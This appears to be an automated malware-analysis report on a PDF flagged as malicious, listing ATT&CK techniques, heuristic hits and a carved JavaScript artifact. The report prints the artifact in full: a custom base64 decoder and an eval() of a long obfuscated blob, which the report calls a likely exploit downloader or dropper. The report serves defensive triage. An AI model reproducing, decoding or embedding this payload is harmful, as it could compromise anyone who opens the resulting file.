MALICIOUS
134
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript that is heavily obfuscated using String.fromCharCode and a custom decoding function. The primary heuristic indicates this is a known exploit cluster targeting PDF vulnerabilities. The decoded JavaScript likely downloads and executes a second-stage payload, making this a downloader or dropper.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
c2=\(\(e2&15\)<<4\)|\(e3>>2\);c3=\(\(e3&3\)<<6\)|e4;\r d=d+String.fromCharCode\(c1\);if\(e3!=64\)d=d+String.fromCharCode\(c2\);\r if\(e4!=64\)d=d+String.fromCharCode\(c3\);}while\(j<t.length\);return d;}eval\(b6\("nqo41WEQgBnfWWBBgfixGpuNJlmadqCz1x+xdqCz1x+xdqCz1x+xdqCNrOisdqCx1xisdqCpLO1ZdqCV15SZdqCV12yjdqiurR1xdqiu1R+xdqiu+OJHdqiu32yBdqiQrOi2dqiQrOJQdqCV+RnQdqi5rRrudqiurOiQdqCpL5iQdqiu1zuQdqCZrRGzdqCz1OGxdqCZrRGzdqCprCCDdqiurRyxdqiurOisdqCpL5iQdqis3WyxdqCp1WmDdqiu1C5jdqCNLxyxdqiurR5jdqiurOiQdqiH+WGpdqis3CisdqCDLxmDdqCpLW5jdqCNLzCjdqiurRuQdqiurOiQdqiH+WGpdqis3CCDdqi2+WmDdqCj12iQdqCNLxd5dqiurRH5dqiurOiQdqiH+WGpdqis3CCxdqCN … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x248 | 4891 bytes |
SHA-256: 0efcad9fe4be71c92945e443de7cc518996bed5981f59a62f3cc8d7dd1fa0eb8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 97 of 127 identifiers look randomly generated (e.g. 'W5NdqCpL5LQdqiuLzuHdqiur2mBdqCpL5SpdqiQL'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function b6(t){var d="";var c1,c2,c3,e1,e2,e3,e4;var j=0;var k="yHs25uQeSd6A1L3M+rlWCiKqGJUgwn09moaROEf=ktYX/h4FNjTxzBpDVZc7IP8vb";
do{e1=k.indexOf(t.charAt(j++));e2=k.indexOf(t.charAt(j++));
e3=k.indexOf(t.charAt(j++));e4=k.indexOf(t.charAt(j++));c1=(e1<<2)|(e2>>4);
c2=((e2&15)<<4)|(e3>>2);c3=((e3&3)<<6)|e4;
d=d+String.fromCharCode(c1);if(e3!=64)d=d+String.fromCharCode(c2);
if(e4!=64)d=d+String.fromCharCode(c3);}while(j<t.length);return d;}eval(b6("nqo41WEQgBnfWWBBgfixGpuNJlmadqCz1x+xdqCz1x+xdqCz1x+xdqCNrOisdqCx1xisdqCpLO1ZdqCV15SZdqCV12yjdqiurR1xdqiu1R+xdqiu+OJHdqiu32yBdqiQrOi2dqiQrOJQdqCV+RnQdqi5rRrudqiurOiQdqCpL5iQdqiu1zuQdqCZrRGzdqCz1OGxdqCZrRGzdqCprCCDdqiurRyxdqiurOisdqCpL5iQdqis3WyxdqCp1WmDdqiu1C5jdqCNLxyxdqiurR5jdqiurOiQdqiH+WGpdqis3CisdqCDLxmDdqCpLW5jdqCNLzCjdqiurRuQdqiurOiQdqiH+WGpdqis3CCDdqi2+WmDdqCj12iQdqCNLxd5dqiurRH5dqiurOiQdqiH+WGpdqis3CCxdqCN12mDdqCNrRSjdqCNLxoQdqiurRLsdqiurOiQdqiH+WGpdqis3CJQdqCTrWmDdqCN+WOpdqCNLxCDdqiurRSZdqiurOiQdqiH+WGpdqiHrOJsdqi5LxJQdqCZ+Wd2dqCpLR5BdqiQLzuHdqiu32ypdqiurOiudqis1CiQdqCZ+WGpdqCpL5Lsdqiu+OuHdqiurWmBdqCpL5SpdqiQLzdHdqCNLzSZdqiurRGzdqiurOiQdqCVLzdQdqiQLC+ZdqCZrO1NdqCD32yDdqiurOiQdqCpLOiQdqiQ1zuHdqCT+WGzdqCTrRJ2dqCpLOdQdqi2rOuHdqCj12mDdqiurOiQdqisrOiQdqiH+WGzdqCVLCJsdqisLOi5dqis+WGzdqCNLzGDdqiurRoudqiurOiQdqiH+Ci2dqCT35LQdqis1ziQdqi21WOjdqCT32oHdqiu+OuQdqCV+WODdqiurOiQdqCZ+W5NdqCpL5LQdqiu1zuHdqiurWmBdqCpL5SpdqiQLzdHdqiHrRyDdqiurOiQdqCVLCiQdqisLzCVdqiH+Ci2dqi5+zLsdqis+x1zdqCj15d2dqi2rREHdqis+zdQdqiH+WGzdqCVLCGxdqisLOiHdqis+WGzdqCNLzGDdqiurOL2dqiurOiQdqiurRmBdqCZ+W5NdqCpL5LQdqiuLzuHdqiur2mBdqCpL5SpdqiQLzdHdqiQrRyDdqiurOiQdqCVLCiQdqCpL25NdqiQrOuHdqiurWmBdqCpL5SpdqiQLzdHdqiurRyDdqiurOiQdqiHrCiQdqisr5SzdqCNrCi2dqCNrCi2dqCNrCi2dqCNrCi2dqCN1xJ2dqisLCisdqCpL5d2dqCNr21Bdqisr25VdqCNrR5NdqCpL5dHdqCpL2yxdqiuLxOTdqis1RGzdqis3CCxdqCZ+xGzdqCpL5+xdqiQ1WEsdqiu+xODdqis3Wu2dqCZ3WGzdqiu+zLQdqi5+xu2dqiHLRSpdqCz1OuudqCT+zi2dqi5+zSZdqiu125ZdqiQrRCjdqCjr5+BdqiuLxEsdqCT1Wdudqiu+zCTdqiHrRu5dqCjrWyzdqCj1C+zdqCZ+CSjdqisLWHHdqCNL2GzdqisLWGzdqiu+zLsdqCV3W1Tdqiu1xGzdqCpL55zdqiQ1zSBdqCx1Oi2dqiu+RGzdqiu+xGzdqis1WdHdqCTr5STdqiurOCDdqCj+RyDdqCj125jdqis+W5NdqiH1zd5dqiH155TdqiurO5jdqCDL2GVdqCD12wzdqCTrRLHdqCxLxdQdqCTrW1VdqCx1W1jdqCTrW1NdqCxLx1jdqCTrW1BdqCx1W1TdqCp1xdQdqCTrRwNdqCTrRGjdqCx1RLQSaO7SeJowaHrnxnsg=oareERUlyPSQZEnTHHw=do0lmt3THfnKZRnQEFgaHuJQBp+zifLewVJxOkiKoH+O5xGCBQKlNm+iJa1pzN6lH7SenkUKjESsoiU5us+WLoWCJJAfjEgfnzUskTM5uKGRLh1sE7iKoH+O5xGCBQKlyXMlHiU5us+WLoWCJJ3DzmiKoH+O5xGCBQKlyPSuik+CdH1puLrEO4wDiawDrTUKZ=62y/+iJa1pzNAxSt3THTJqrBwfVmiKoH+O5xGCBQKW/m9lHfnKZRnQEFgaHaUqCZr2nZgz1k0eSBgBdlWB+tSe/mnfuTS5P3n2iiJTyPS2HV1Q1NGxHR1Q17SeJowaHG0udqCO/xrD+mMlyN02+N12yN12/mnfuTSuHpniiaCRJ5UayPSeoTLKPlCOPCAfjEgfnzUsyYS2S7SeJowaHHifSxgWymMlHG0udqCO/xrD+mAlykCeJBiKdlLOrY6xHV1xmt3THpGqSmiKoH+O5xGCBQKlyPSei4JqLRGqHE6sSEnWON3WyEnWON3Wya6W/miKoH+O5xGCBQKlyPS5iOgqJ2rKGznxo=3loiU5us+WLoWCJJAsHHifSxgWyt3THpGqSmWeHYiQVz0u5TLTyPSsoMW=+BiKwmAlyN02+N12yN1sOFKeoliBdA1znz3THfgDSm6eJowaH10ftVKKnGLWLTWOZalxzN3zjcU=oJJBmB1Dd3WfdAM5jNUEr4Leor1Rw7WetY0uE=K2CxwOZ3GO/X6TOm0THrnxnsg=oareERUih10ftVKKnGLWLTWOZalBzmMlHiU5us+WLoWCJJSs/m0eSBgBdlWB+7Sezm9lHfnKZRnQEFgaH2gfox1zSkWK/jWCnWCWJpWzh36lH7SeJowaHz3KPzrDrXCCdeGOImMlHowey4nfEEnpiTifiTwpEFgaZzgBLzwfE4JTmt3THz3KPzrDrXCCdeGOImMlHz3KPzrDrXCCdeGOI4wfiNgQuRJlmFq5+FJTNaSaO7SeJowaHBCDtHleiDCC/ziuCmMlH4Jqwm+qdTGqOkn2EFn5nzUBusrpdMAfLkGqdHnsmN6ljz3KPzrDrXCCdeGOI4GpoowOuz625tAe+ZgDrenQhr+OnaWTZRUQuT+q+k1aOt3THtJayk6eiW0OuSnqnrlxrCii/NqlyPMlyVSsGfSsmkniLc+CoBnBuALuriKxunS2zPS25mdaGmniLc+CoBnBuALuriKxdnS2Nm1aOm9eNmniLc+CoBnBuALuriKxunS2Nm1lOtSejISsoBCDtHleiDCC/ziuig1uzmMWzmLTyfdaHBCDtHleiDCC/ziuig1izmMsyj6lHI9sykniLc+CoBnBuALuriKxHnS2NmLTOtSe/mGfEB3C+D0KP265BX1CBeCB5pnOPAWaO7SeJowaH1lforlfizwxwmMlHBgfixGpuNJlmadqCNGxHRdqCNGxHRSaO7SenkUKjE65j6Uuu6JqrxLTZ/JKZ=nQmmMsyzL2OB1aOmW5tkCCtEne1DSs/PS5j6Uuu6JqrxLx/mnQotwTZRgpj/GKdWnQPTJlyPS5LFgQjoGaZRgpj/JKLzrKBoUKjdgfJF6ehxnKdY3ayaSajhwpwcS5j6Uuu6JqrxLDzt3THTJqrBwfVm12/m9qdEneiTgayj3THPSQEf65L4Ue1x+aoB0QVj3CJFipJL6lE7SeJowaHMwKZS0WBBgfixGpuNJlmadqCN+WHHdqCN+WHHSaO7nfuTSQZhMWSN3DJowaHfJxB4glhB0QVj3CJFipJLAfjEgfnzU2/mnpotgQCkWDu4leO4gQi4JDrkMQJ=6CPjgOoZ6xBMwKZS0WhpGqSmgfBawRBMwKZS0lZxnKdxnedtgfwk1sjfJTO7SeJowaHxnQE=MCPjgOoZA=LBG=LzwfE4JTmNA5PjgOoZAfjEgfnzUsBfJTO7SenkUKjE6eLzUKw4gQi4JDrk6pJ=M2HVLRyN12ytwDrtJxBxnQE=6DLzUKwXgfBawR/mnfuTSQuTwfzPgfiDS5uTwfuZ6sO7JfPT6QEcMWy7UqkI1WSN12ht0a/X6qhow=dhKpEcqWBxnQE=6DiVgR5ZrfPqJOBPSeJowaHoCCJ5reuJ0CVDg5OPSR5T3lSXSROZ3WOZ3WOZSa/a3WOZ3WOa6TSZ3WOZSa/a32mV32mV3sSXSRmV32mV32mV32mV32mV32mV32mV32mV32mV32mV3sSXSRmV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mVSa/a32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mVSa/a32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32mV32ma6TSV32mV32mV32mV32mVSa/a32mV32mV32mV32mV32mV32mV3sSXSRmV32mV32mV32mV32mVSR/mnqrtgsZNwfE4nQGkSaCzLWyN1QGaAQurrOr5wiEZWRn/llO79+bb"));
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.